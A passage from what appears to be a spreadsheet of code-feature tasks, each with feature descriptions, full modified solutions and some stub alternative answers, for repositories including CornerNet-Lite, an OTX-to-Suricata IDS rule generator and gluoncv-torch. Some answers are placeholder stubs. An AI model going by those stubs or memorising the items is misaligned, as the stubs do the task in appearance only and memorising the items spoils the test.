----------\n    c : ndarray\n        Cepstral coefficients\n    m : int, optional\n        Order of autocorrelation output\n    fftlen : int, optional\n        FFT length for computation\n        \n    Returns\n    -------\n    acr : ndarray\n        Autocorrelation coefficients\n    """\n    if m is None:\n        m = len(c) - 1\n    return _c2acr(c, m, fftlen)\n\n---\n\n# pysptk/pysptk/__init__.py\n# #Modify - Update imports to include new c2acr function\nfrom . import synthesis, util  # noqa\nfrom .conversion import mc2e, mc2sp, mgc2b, sp2mc, c2acr  # noqa #Modify - Added c2acr\nfrom .sptk import *  # noqa\nfrom .version import __version__  # noqa'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from .sptk import *  # noqa\nfrom . import new_feature_function  #Modify', '#file 2': 'from . import synthesis, util  # noqa\nfrom . import new_feature_function  #Modify', '#file 3': 'def new_feature_function():  #New\n    # Implementation of the new feature\n    pass'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def test_func(sys_config, db, nnet, result_dir, debug=False):\n    return globals()[sys_config.sampling_function](db, nnet, result_dir, debug=debug)', 'invoking_code_segment': 'test_func(system_config, db, nnet, result_dir, debug=debug)', 'feature_description': 'Add a new feature to log the execution of the test function with timestamps and parameters', 'modified_complete_code': '# File 1: CornerNet-Lite/core/test/__init__.py\nimport logging\nfrom datetime import datetime\nfrom .cornernet import cornernet\nfrom .cornernet_saccade import cornernet_saccade\n\n# #New - Configure logging for test execution\nlogger = logging.getLogger(__name__)\n\ndef test_func(sys_config, db, nnet, result_dir, debug=False):\n    # #New - Log test function execution start\n    logger.info(f"Test function execution started at {datetime.now().isoformat()}")\n    logger.info(f"Sampling function: {sys_config.sampling_function}")\n    logger.info(f"Result directory: {result_dir}")\n    logger.info(f"Debug mode: {debug}")\n    \n    try:\n        # #Modify - Original function call with logging\n        result = globals()[sys_config.sampling_function](db, nnet, result_dir, debug=debug)\n        logger.info(f"Test function execution completed successfully at {datetime.now().isoformat()}")\n        return result\n    except Exception as e:\n        # #New - Log any exceptions during test execution\n        logger.error(f"Test function execution failed at {datetime.now().isoformat()}: {str(e)}", exc_info=True)\n        raise\n\n---\n\n# File 2: CornerNet-Lite/evaluate.py\n#!/usr/bin/env python\nimport os\nimport json\nimport torch\nimport pprint\nimport argparse\nimport importlib\nimport logging\nfrom datetime import datetime\n\nfrom core.dbs import datasets\nfrom core.test import test_func\nfrom core.config import SystemConfig\nfrom core.nnet.py_factory import NetworkFactory\n\ntorch.backends.cudnn.benchmark = False\n\n# #New - Configure logging for evaluation script\nlogging.basicConfig(\n    level=logging.INFO,\n    format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\',\n    handlers=[\n        logging.FileHandler(\'evaluation.log\'),\n        logging.StreamHandler()\n    ]\n)\nlogger = logging.getLogger(__name__)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description="Evaluation Script")\n    parser.add_argument("cfg_file", help="config file", type=str)\n    parser.add_argument("--testiter", dest="testiter",\n                        help="test at iteration i",\n                        default=None, type=int)\n    parser.add_argument("--split", dest="split",\n                        help="which split to use",\n                        default="validation", type=str)\n    parser.add_argument("--suffix", dest="suffix", default=None, type=str)\n    parser.add_argument("--debug", action="store_true")\n\n    args = parser.parse_args()\n    return args\n\ndef make_dirs(directories):\n    for directory in directories:\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n\ndef test(db, system_config, model, args):\n    split    = args.split\n    testiter = args.testiter\n    debug    = args.debug\n    suffix   = args.suffix\n\n    result_dir = system_config.result_dir\n    result_dir = os.path.join(result_dir, str(testiter), split)\n\n    if suffix is not None:\n        result_dir = os.path.join(result_dir, suffix)\n\n    make_dirs([result_dir])\n\n    test_iter = system_config.max_iter if testiter is None else testiter\n    print("loading parameters at iteration: {}".format(test_iter))\n\n    print("building neural network...")\n    nnet = NetworkFactory(system_config, model)\n    print("loading parameters...")\n    nnet.load_params(test_iter)\n\n    nnet.cuda()\n    nnet.eval_mode()\n    \n    # #Modify - Log before calling test_func\n    logger.info(f"Invoking test_func with split={split}, testiter={test_iter}, debug={debug}")\n    test_func(system_config, db, nnet, result_dir, debug=debug)\n    logger.info(f"test_func completed for split={split}")\n\ndef main(args):\n    if args.suffix is None:\n        cfg_file = os.path.join("./configs", args.cfg_file + ".json")\n    else:\n        cfg_file = os.path.join("./configs", args.cfg_file + "-{}.json".format(args.suffix))\n    print("cfg_file: {}".format(cfg_file))\n\n    with open(cfg_file, "r") as f:\n        config = json.load(f)\n            \n    config["system"]["snapshot_name"] = args.cfg_file\n    system_config = SystemConfig().update_config(config["system"])\n\n    model_file  = "core.models.{}".format(args.cfg_file)\n    model_file  = importlib.import_module(model_file)\n    model       = model_file.model()\n\n    train_split = system_config.train_split\n    val_split   = system_config.val_split\n    test_split  = system_config.test_split\n\n    split = {\n        "training": train_split,\n        "validation": val_split,\n        "testing": test_split\n    }[args.split]\n\n    print("loading all datasets...")\n    dataset = system_config.dataset\n    print("split: {}".format(split))\n    testing_db = datasets[dataset](config["db"], split=split, sys_config=system_config)\n\n    print("system config...")\n    pprint.pprint(system_config.full)\n\n    print("db config...")\n    pprint.pprint(testing_db.configs)\n\n    test(testing_db, system_config, model, args)\n\nif __name__ == "__main__":\n    args = parse_args()\n    main(args)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from .cornernet import cornernet\nfrom .cornernet_saccade import cornernet_saccade\nfrom .new_feature import new_feature_func  #New\n\n#Modify\ndef test_func(sys_config, db, nnet, result_dir, debug=False):\n    new_feature_func(db, nnet, result_dir, debug)  #New\n    return globals()[sys_config.sampling_function](db, nnet, result_dir, debug=debug)', '#file 2': 'from core.test import test_func\n\n#Modify\ndef test(db, system_config, model, args):\n    split    = args.split\n    testiter = args.testiter\n    debug    = args.debug\n    suffix   = args.suffix\n\n    result_dir = system_config.result_dir\n    result_dir = os.path.join(result_dir, str(testiter), split)\n\n    if suffix is not None:\n        result_dir = os.path.join(result_dir, suffix)\n\n    make_dirs([result_dir])\n\n    test_iter = system_config.max_iter if testiter is None else testiter\n    print("loading parameters at iteration: {}".format(test_iter))\n\n    print("building neural network...")\n    nnet = NetworkFactory(system_config, model)\n    print("loading parameters...")\n    nnet.load_params(test_iter)\n\n    nnet.cuda()\n    nnet.eval_mode()\n    test_func(system_config, db, nnet, result_dir, debug=debug)', '#file 3': "def new_feature_func(db, nnet, result_dir, debug=False):\n    # New feature implementation\n    print('New feature executed')\n    return True"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'SuricataClient.generate_rules(generate_md5_rules=False, generate_iprep=False) method in suricata.py', 'invoking_code_segment': 'TestGenerateRules.testRuleGenerate() method in test_rules.py calling self.suricata_client.generate_rules(True, True)', 'feature_description': 'Add a new URL reputation rule generation feature that creates URL-based Suricata rules and reputation lists from OTX pulses, similar to the existing IP reputation and MD5 file hash features. This includes generating URL reputation rules, URL reputation list files, and corresponding configuration snippets for suricata.yaml.', 'modified_complete_code': '# FILE 1: suricata.py\n#!/usr/bin/python\n\nimport argparse\nimport os\nimport sys\n\nimport math\nfrom random import randint\n\nimport unicodedata\nfrom OTXv2 import OTXv2\nimport IndicatorTypes\n\n\nclass SuricataClient(object):\n    ip_rule_template = "alert ip $HOME_NET any -&gt; any any (msg:\\"OTX internal host talking to host known in pulse\\"; flow:to_server; iprep:dst,Pulse,&gt;,30; sid:41414141; rev:1;)\\n"\n    ip_category_template = "41,Pulse,OTX community identified IP address\\n"\n    ip_rep_template = "{ip},41,127\\n"\n\n    file_rule_template = "alert http any any -&gt; $HOME_NET any (msg:\\"OTX - FILE MD5 from pulse {name}\\";  filemd5:{pulse_md5_file}; reference: url, otx.alienvault.com/pulse/{pulse_id}; sid:41{random}; rev:1;)\\n"\n    \n    #New: URL reputation rule template\n    url_rule_template = "alert http any any -&gt; any any (msg:\\"OTX - URL from pulse {name}\\"; content:\\"{url}\\"; http_uri; reference: url, otx.alienvault.com/pulse/{pulse_id}; sid:42{random}; rev:1;)\\n"\n    #New: URL reputation category template\n    url_category_template = "42,URLReputation,OTX community identified malicious URL\\n"\n    #New: URL reputation list template\n    url_rep_template = "{url},42,127\\n"\n\n    def __init__(self, api_key, base_dir):\n        self.client = OTXv2(api_key=api_key, project="Suricata")\n        self.base_dir = base_dir\n\n    def get_destination(self, param):\n        return open(self.get_path(param), mode=\'w\')\n\n    def get_path(self, param):\n        return os.path.join(self.base_dir, param)\n\n    #Modify: Updated method signature to include generate_url_rules parameter\n    def generate_rules(self, generate_md5_rules=False, generate_iprep=False, generate_url_rules=False):\n        with self.get_destination(\'otx_file_rules.rules\') as file_rule_file:\n            with self.get_destination(\'reputation.list\') as rep_file:\n                #New: Open URL rules file if URL rule generation is enabled\n                url_rule_file = self.get_destination(\'otx_url_rules.rules\') if generate_url_rules else None\n                url_rep_file = self.get_destination(\'url_reputation.list\') if generate_url_rules else None\n                \n                md5_file_count = 0\n                ip_count = 0\n                #New: Initialize URL count\n                url_count = 0\n                \n                for pulse in self.client.getall_iter():\n                    pulse_id = pulse[\'id\']\n                    md5_list = []\n                    ip_list = []\n                    #New: Initialize URL list\n                    url_list = []\n                    \n                    for indicator in pulse["indicators"]:\n                        type_ = indicator["type"]\n                        if type_ == IndicatorTypes.FILE_HASH_MD5.name:\n                            md5_list.append(indicator["indicator"])\n                        if type_ in [IndicatorTypes.IPv4.name, IndicatorTypes.IPv6.name]:\n                            ip_list.append(indicator["indicator"])\n                        #New: Extract URL indicators\n                        if type_ == IndicatorTypes.URL.name:\n                            url_list.append(indicator["indicator"])\n\n                    if len(md5_list) &gt; 0 and generate_md5_rules:\n                        md5_file = \'{0}.txt\'.format(pulse_id)\n                        self.add_file_rule(file_rule_file, md5_file, pulse, pulse_id)\n                        self.write_hash_file(md5_list, md5_file)\n                        md5_file_count += 1\n                    if len(ip_list) &gt; 0 and generate_iprep:\n                        self.add_iprep(rep_file, ip_list)\n                        ip_count += len(ip_list)\n                    #New: Process URL indicators if URL rule generation is enabled\n                    if len(url_list) &gt; 0 and generate_url_rules:\n                        self.add_url_rules(url_rule_file, url_list, pulse, pulse_id)\n                        self.add_url_rep(url_rep_file, url_list)\n                        url_count += len(url_list)\n                \n                #New: Close URL files if they were opened\n                if url_rule_file:\n                    url_rule_file.close()\n                if url_rep_file:\n                    url_rep_file.close()\n                \n                if generate_iprep:\n                    self.write_core_iprep_files()\n                    sys.stdout.write(\n                        "Wrote related iprep rules to {}\\n".format(\'otx_iprep.rules\'))\n                    sys.stdout.write("Wrote {0} IPv4 &amp; IPv6 to {1}\\n".format(str(ip_count), rep_file.name))\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write(\n                        "To leverage generated files, enable the suricata iprep feature in suricata.yaml\\n")\n                    sys.stdout.write(\n                        "A default configuration for iprep with these rules can be enabled by appending the following to suricata.yaml\\n")\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write("NOTE: Please read the docs to adapt for your environment\\n")\n                    sys.stdout.write("========== Start YAML Snippet ==========")\n                    sys.stdout.write("reputation-categories-file: {}\\n".format(self.get_path(\'categories.txt\')))\n                    sys.stdout.write("default-reputation-path: {}\\n".format(self.base_dir))\n                    sys.stdout.write("reputation-files:\\n")\n                    sys.stdout.write(" - reputation.list\\n")\n                    sys.stdout.write("rule-files:\\n")\n                    sys.stdout.write(" - {}\\n".format(self.get_path(\'otx_iprep.rules\')))\n                    sys.stdout.write("==========  End YAML Snippet  ==========\\n")\n                #New: Output URL rules configuration if URL rules were generated\n                if generate_url_rules:\n                    self.write_core_url_files()\n                    sys.stdout.write("Wrote {0} URL rules to {1}\\n".format(str(url_count), \'otx_url_rules.rules\'))\n                    sys.stdout.write("Wrote {0} URLs to {1}\\n".format(str(url_count), \'url_reputation.list\'))\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write("To leverage generated URL files, add the following to suricata.yaml\\n")\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write("NOTE: Please read the docs to adapt for your environment\\n")\n                    sys.stdout.write("========== Start YAML Snippet ==========")\n                    sys.stdout.write("rule-files:\\n")\n                    sys.stdout.write(" - {}\\n".format(self.get_path(\'otx_url_rules.rules\')))\n                    sys.stdout.write("==========  End YAML Snippet  ==========\\n")\n                if generate_md5_rules:\n                    sys.stdout.write("Wrote {0} md5 hash files to {1}\\n".format(str(md5_file_count), self.base_dir))\n                    sys.stdout.write("Wrote {0} rules to {1}\\n".format(str(md5_file_count), file_rule_file.name))\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write("To leverage generated files, enable the suricata file feature in suricata.yaml\\n")\n                    sys.stdout.write(\n                        "A default configuration for the file feature with these rules can be enabled by append the following to suricata.yaml\\n")\n                    sys.stdout.write(\n                        "The following was a snippet from \'http://jasonish-suricata.readthedocs.org/en/latest/file-extraction/file-extraction.html\'\\n")\n                    sys.stdout.write("========================================\\n")\n                    sys.stdout.write("NOTE: Please read the docs to adapt for your environment\\n")\n                    sys.stdout.write("========== Start YAML Snippet ==========")\n                    sys.stdout.write("- file-log:\\n")\n                    sys.stdout.write("    enabled: yes\\n")\n                    sys.stdout.write("    filename: files-json.log\\n")\n                    sys.stdout.write("    append: yes\\n")\n                    sys.stdout.write("    force-magic: no\\n")\n                    sys.stdout.write("    force-md5: no\\n")\n                    sys.stdout.write("    waldo: file.waldo\\n")\n                    sys.stdout.write("==========  End YAML Snippet  ==========\\n")\n\n    def add_file_rule(self, rule_file=None, md5_file=None, pulse=None, pulse_id=None):\n        rule_file.write(SuricataClient.file_rule_template.format(name=self.clean(pulse[\'name\']),\n                                                                 pulse_md5_file=md5_file,\n                                                                 pulse_id=pulse_id,\n                                                                 random=randint(1000, 9999)))\n\n    #New: Method to add URL rules\n    def add_url_rules(self, rule_file=None, url_list=None, pulse=None, pulse_id=None):\n        for url in url_list:\n            rule_file.write(SuricataClient.url_rule_template.format(name=self.clean(pulse[\'name\']),\n                                                                    url=url,\n                                                                    pulse_id=pulse_id,\n                                                                    random=randint(1000, 9999)))\n\n    def clean(self, param):\n        return unicodedata.normalize("NFKD", param).encode(\'ascii\', \'ignore\')\n\n    def write_hash_file(self, md5_list, md5_file=None):\n        with self.get_destination(md5_file) as hash_file:\n            for md5 in md5_list:\n                hash_file.write("{0}\\n".format(md5))\n\n    def add_iprep(self, rep_file, ip_list):\n        for ip in ip_list:\n            rep_file.write(SuricataClient.ip_rep_template.format(ip=ip))\n\n    #New: Method to add URL reputation entries\n    def add_url_rep(self, rep_file, url_list):\n        for url in url_list:\n            rep_file.write(SuricataClient.url_rep_template.format(url=url))\n\n    def write_core_iprep_files(self):\n        with self.get_destination(\'categories.txt\') as file:\n            file.write(SuricataClient.ip_category_template)\n        with self.get_destination(\'otx_iprep.rules\') as file:\n            file.write(SuricataClient.ip_rule_template)\n\n    #New: Method to write core URL reputation files\n    def write_core_url_files(self):\n        with self.get_destination(\'url_categories.txt\') as file:\n            file.write(SuricataClient.url_category_template)\n\n\ndef getArgs():\n    parser = argparse.ArgumentParser()\n    parser.add_argument("--skip-iprep", action=\'store_true\', default=False,\n                        help="Do not generate IP Reputation files and rules")\n    parser.add_argument("--skip-filemd5", action=\'store_true\', default=False, help="Do not generate file MD5 and rules")\n    #New: Add argument for URL rules\n    parser.add_argument("--generate-url-rules", action=\'store_true\', default=False, help="Generate URL reputation rules")\n    parser.add_argument("--key", required=True, help="Your OTX API key (https://otx.alienvault.com/api)")\n    parser.add_argument("--destination-directory", "-dd", required=False,\n                        help="The destination directory for the generated file")\n    return parser.parse_args()\n\n\nif __name__ == \'__main__\':\n    print (sys.argv)\n    args = getArgs()\n    if args.destination_directory:\n        base_dir = args.destination_directory\n    else:\n        base_dir = os.getcwd()\n    sclient = SuricataClient(args.key, base_dir=base_dir)\n    #Modify: Pass generate_url_rules parameter\n    sclient.generate_rules(not args.skip_iprep, not args.skip_filemd5, args.generate_url_rules)\n\n# FILE 2: test_rules.py\nimport unittest\nimport datetime\nimport os\nimport pprint\nimport string\nimport re\n\nfrom OTXv2 import OTXv2, InvalidAPIKey, BadRequest\nfrom suricata import SuricataClient\nimport IndicatorTypes\n\nALIEN_API_APIKEY = os.getenv(\'X_OTX_API_KEY\', "mysecretkey")\nSTRP_TIME_FORMAT = \'%Y-%m-%dT%H:%M:%S.%f\'\nFILE_RULE_REGEX = "^alert[^;]+[^\\)]+\\)$"\nIPV4_RULE_REGEX = "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?),$"\nIPV6_RULE_REGEX = "^(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"\n#New: URL rule regex\nURL_RULE_REGEX = "^alert http[^;]+[^\\)]+\\)$"\n\nclass TestOTXv2(unittest.TestCase):\n    def setUp(self, **kwargs):\n        provided_key = kwargs.get(\'api_key\', \'\')\n        if provided_key:\n            self.api_key = provided_key\n        else:\n            self.api_key = ALIEN_API_APIKEY\n        self.suricata_client = SuricataClient(self.api_key, "./")\n\n\nclass TestGenerateRules(TestOTXv2):\n\n    def setUp(self, **kwargs):\n        super(TestGenerateRules, self).setUp(**{\'api_key\': ALIEN_API_APIKEY})\n\n    #Modify: Updated method to test URL rules generation\n    def testRuleGenerate(self):\n        self.suricata_client.generate_rules(True, True, True)\n\n        file_rules = []\n        with open(\'otx_file_rules.rules\', \'r\') as f:\n            file_rules = f.readlines()\n        self.assertTrue(file_rules)\n        for rule in file_rules:\n            print ("- Validating file rule [" + rule.strip() + "]")\n            self.assertTrue(re.match(FILE_RULE_REGEX, rule.strip()))\n\n        ip_rules = []\n        with open(\'reputation.list\', \'r\') as f:\n            ip_rules = f.readlines()\n        self.assertTrue(ip_rules)\n        for rule in ip_rules:\n            print ("- Validating IP rule [" + rule.strip() + "]")\n            self.assertTrue(re.match(IPV4_RULE_REGEX, rule.strip()) or re.match(IPV6_RULE_REGEX, rule.strip()))\n\n        #New: Test URL rules if file exists\n        if os.path.exists(\'otx_url_rules.rules\'):\n            url_rules = []\n            with open(\'otx_url_rules.rules\', \'r\') as f:\n                url_rules = f.readlines()\n            if url_rules:\n                self.assertTrue(url_rules)\n                for rule in url_rules:\n                    print ("- Validating URL rule [" + rule.strip() + "]")\n                    self.assertTrue(re.match(URL_RULE_REGEX, rule.strip()))\n\nif __name__ == \'__main__\':\n    unittest.main()'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\nclass SuricataClient(object):\n    # Existing code...\n\n    def generate_rules(self, generate_md5_rules=False, generate_iprep=False):\n        # Existing code...\n        if generate_md5_rules:\n            sys.stdout.write("Wrote {0} md5 hash files to {1}\\n".format(str(md5_file_count), self.base_dir))\n            sys.stdout.write("Wrote {0} rules to {1}\\n".format(str(md5_file_count), file_rule_file.name))\n            sys.stdout.write("========================================\\n")\n            sys.stdout.write("To leverage generated files, enable the suricata file feature in suricata.yaml\\n")\n            sys.stdout.write(\n                "A default configuration for the file feature with these rules can be enabled by append the following to suricata.yaml\\n")\n            sys.stdout.write(\n                "The following was a snippet from \'http://jasonish-suricata.readthedocs.org/en/latest/file-extraction/file-extraction.html\'\\n")\n            sys.stdout.write("========================================\\n")\n            sys.stdout.write("NOTE: Please read the docs to adapt for your environment\\n")\n            sys.stdout.write("========== Start YAML Snippet ==========\\n")\n            sys.stdout.write("- file-log:\\n")\n            sys.stdout.write("    enabled: yes\\n")\n            sys.stdout.write("    filename: files-json.log\\n")\n            sys.stdout.write("    append: yes\\n")\n            sys.stdout.write("    force-magic: no\\n")\n            sys.stdout.write("    force-md5: no\\n")\n            sys.stdout.write("    waldo: file.waldo\\n")\n            sys.stdout.write("==========  End YAML Snippet  ==========\\n")\n        # New\n        self.generate_additional_rules()\n\n    # New\n    def generate_additional_rules(self):\n        # New function to generate additional rules\n        with self.get_destination(\'additional_rules.rules\') as additional_rule_file:\n            additional_rule_file.write("# Additional rules generated by OTX-Suricata\\n")\n            # Example additional rule\n            additional_rule_file.write("alert http any any -&gt; $HOME_NET any (msg:\'OTX - Additional Rule\'; sid:50000001; rev:1;)\\n")\n', '#file 2': "#Modify\nif __name__ == '__main__':\n    print (sys.argv)\n    args = getArgs()\n    if args.destination_directory:\n        base_dir = args.destination_directory\n    else:\n        base_dir = os.getcwd()\n    sclient = SuricataClient(args.key, base_dir=base_dir)\n    sclient.generate_rules(not args.skip_iprep, not args.skip_filemd5)\n    # New\n    sclient.generate_additional_rules()\n", '#file 3': '#New\ndef generate_additional_rules(self):\n    # New function to generate additional rules\n    with self.get_destination(\'additional_rules.rules\') as additional_rule_file:\n        additional_rule_file.write("# Additional rules generated by OTX-Suricata\\n")\n        # Example additional rule\n        additional_rule_file.write("alert http any any -&gt; $HOME_NET any (msg:\'OTX - Additional Rule\'; sid:50000001; rev:1;)\\n")\n'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ResNet class __init__ and forward methods, resnet18/resnet34/resnet50/resnet101/resnet152 functions', 'invoking_code_segment': 'get_model function in model_zoo.py that calls resnet18, resnet34, resnet50, resnet101, resnet152', 'feature_description': 'Add a custom layer to the ResNet model that allows users to insert a custom layer before the final classification layer. This enables flexible model architecture modifications for transfer learning and domain adaptation tasks.', 'modified_complete_code': '# File 1: gluoncv-torch/gluoncvth/models/resnet.py\n"""Dilated ResNet"""\nimport math\nimport torch\nimport torch.utils.model_zoo as model_zoo\nimport torch.nn as nn\nfrom ..models.model_store import get_model_file\n\n__all__ = [\'ResNet\', \'resnet18\', \'resnet34\', \'resnet50\', \'resnet101\', \'resnet152\']\n\ndef conv3x3(in_planes, out_planes, stride=1):\n    "3x3 convolution with padding"\n    return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\nclass BasicBlock(nn.Module):\n    """ResNet BasicBlock"""\n    expansion = 1\n    def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, previous_dilation=1, norm_layer=None):\n        super(BasicBlock, self).__init__()\n        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)\n        self.bn1 = norm_layer(planes)\n        self.relu = nn.ReLU(inplace=True)\n        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=previous_dilation, dilation=previous_dilation, bias=False)\n        self.bn2 = norm_layer(planes)\n        self.downsample = downsample\n        self.stride = stride\n\n    def forward(self, x):\n        residual = x\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu(out)\n        out = self.conv2(out)\n        out = self.bn2(out)\n        if self.downsample is not None:\n            residual = self.downsample(x)\n        out += residual\n        out = self.relu(out)\n        return out\n\nclass Bottleneck(nn.Module):\n    """ResNet Bottleneck"""\n    expansion = 4\n    def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, previous_dilation=1, norm_layer=None):\n        super(Bottleneck, self).__init__()\n        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n        self.bn1 = norm_layer(planes)\n        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)\n        self.bn2 = norm_layer(planes)\n        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n        self.bn3 = norm_layer(planes * 4)\n        self.relu = nn.ReLU(inplace=True)\n        self.downsample = downsample\n        self.dilation = dilation\n        self.stride = stride\n\n    def _sum_each(self, x, y):\n        assert(len(x) == len(y))\n        z = []\n        for i in range(len(x)):\n            z.append(x[i]+y[i])\n        return z\n\n    def forward(self, x):\n        residual = x\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu(out)\n        out = self.conv2(out)\n        out = self.bn2(out)\n        out = self.relu(out)\n        out = self.conv3(out)\n        out = self.bn3(out)\n        if self.downsample is not None:\n            residual = self.downsample(x)\n        out += residual\n        out = self.relu(out)\n        return out\n\nclass ResNet(nn.Module):\n    """Dilated Pre-trained ResNet Model, which preduces the stride of 8 featuremaps at conv5.\n    Parameters\n    ----------\n    block : Block\n        Class for the residual block. Options are BasicBlockV1, BottleneckV1.\n    layers : list of int\n        Numbers of layers in each block\n    classes : int, default 1000\n        Number of classification classes.\n    dilated : bool, default False\n        Applying dilation strategy to pretrained ResNet yielding a stride-8 model,\n        typically used in Semantic Segmentation.\n    norm_layer : object\n        Normalization layer used in backbone network (default: :class:`mxnet.gluon.nn.BatchNorm`;\n        for Synchronized Cross-GPU BachNormalization).\n    custom_layer : nn.Module, optional #New\n        Custom layer to insert before the final classification layer.\n    Reference:\n        - He, Kaiming, et al. "Deep residual learning for image recognition." Proceedings of the IEEE conference on computer vision and pattern recognition. 2016.\n        - Yu, Fisher, and Vladlen Koltun. "Multi-scale context aggregation by dilated convolutions."\n    """\n    def __init__(self, block, layers, num_classes=1000, dilated=True, deep_base=False, norm_layer=nn.BatchNorm2d, custom_layer=None): #Modify\n        self.inplanes = 128 if deep_base else 64\n        super(ResNet, self).__init__()\n        if deep_base:\n            self.conv1 = nn.Sequential(\n                nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1, bias=False),\n                norm_layer(64),\n                nn.ReLU(inplace=True),\n                nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=False),\n                norm_layer(64),\n                nn.ReLU(inplace=True),\n                nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False),\n            )\n        else:\n            self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n        self.bn1 = norm_layer(self.inplanes)\n        self.relu = nn.ReLU(inplace=True)\n        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n        self.layer1 = self._make_layer(block, 64, layers[0], norm_layer=norm_layer)\n        self.layer2 = self._make_layer(block, 128, layers[1], stride=2, norm_layer=norm_layer)\n        if dilated:\n            self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2, norm_layer=norm_layer)\n            self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4, norm_layer=norm_layer)\n        else:\n            self.layer3 = self._make_layer(block, 256, layers[2], stride=2, norm_layer=norm_layer)\n            self.layer4 = self._make_layer(block, 512, layers[3], stride=2, norm_layer=norm_layer)\n        self.avgpool = nn.AvgPool2d(7, stride=1)\n        self.custom_layer = custom_layer #New\n        self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n                m.weight.data.normal_(0, math.sqrt(2. / n))\n            elif isinstance(m, norm_layer):\n                m.weight.data.fill_(1)\n                m.bias.data.zero_()\n\n    def _make_layer(self, block, planes, blocks, stride=1, dilation=1, norm_layer=None):\n        downsample = None\n        if stride != 1 or self.inplanes != planes * block.expansion:\n            downsample = nn.Sequential(\n                nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),\n                norm_layer(planes * block.expansion),\n            )\n        layers = []\n        if dilation == 1 or dilation == 2:\n            layers.append(block(self.inplanes, planes, stride, dilation=1, downsample=downsample, previous_dilation=dilation, norm_layer=norm_layer))\n        elif dilation == 4:\n            layers.append(block(self.inplanes, planes, stride, dilation=2, downsample=downsample, previous_dilation=dilation, norm_layer=norm_layer))\n        else:\n            raise RuntimeError("=&gt; unknown dilation size: {}".format(dilation))\n        self.inplanes = planes * block.expansion\n        for i in range(1, blocks):\n            layers.append(block(self.inplanes, planes, dilation=dilation, previous_dilation=dilation, norm_layer=norm_layer))\n        return nn.Sequential(*layers)\n\n    def forward(self, x): #Modify\n        x = self.conv1(x)\n        x = self.bn1(x)\n        x = self.relu(x)\n        x = self.maxpool(x)\n        x = self.layer1(x)\n        x = self.layer2(x)\n        x = self.layer3(x)\n        x = self.layer4(x)\n        x = self.avgpool(x)\n        x = x.view(x.size(0), -1)\n        if self.custom_layer is not None: #New\n            x = self.custom_layer(x)\n        x = self.fc(x)\n        return x\n\ndef resnet18(pretrained=True, root=\'~/.gluoncvth/models\', custom_layer=None, **kwargs): #Modify\n    """Constructs a ResNet-18 model.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        custom_layer (nn.Module, optional): Custom layer to insert before final classification layer #New\n    """\n    model = ResNet(BasicBlock, [2, 2, 2, 2], custom_layer=custom_layer, **kwargs) #Modify\n    if pretrained:\n        model.load_state_dict(torch.load(get_model_file(\'resnet18\', root=root)), strict=False)\n    return model\n\ndef resnet34(pretrained=True, root=\'~/.gluoncvth/models\', custom_layer=None, **kwargs): #Modify\n    """Constructs a ResNet-34 model.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        custom_layer (nn.Module, optional): Custom 